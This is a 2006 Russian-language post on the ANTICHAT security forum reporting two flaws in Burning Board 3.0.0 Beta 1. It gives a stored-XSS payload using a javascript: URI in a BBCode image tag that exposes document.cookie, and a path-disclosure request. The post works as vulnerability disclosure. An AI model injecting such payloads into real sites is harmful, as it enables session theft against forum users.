HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Burning Board 3.0.0 Beta 1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Burning Board 3.0.0 Beta 1
  #1  
Старый 14.12.2006, 22:31
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию Burning Board 3.0.0 Beta 1
Вот что я надыбал в Burning Board 3.0.0 Beta 1

1. Активная XSS прямо в сообщении

Код:
[img]javascript:alert(document.cookie)[/img]
заменяеться на
Код:
<img src="java&*#115;cript:alert(document.cookie)" class="resizeImage" alt="" />
и куки у нас в алерте

2. Раскрытие пути


При подстановке неверного значения в переменную $_GET["page"] выдаеться сообщение об ошибке
Код:
index.php?page=Bugaga
Можно узнать полный путь к форуму
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
WoltLab Burning Board 2.2 - что за крепость, и есть ли уязвимости? Anti Уязвимости CMS / форумов 8 13.06.2006 16:09
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Уязвимости CMS / форумов 14 19.04.2006 19:40
Дырки в Burning Board 2.3.3 Nova Уязвимости CMS / форумов 8 02.01.2006 21:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.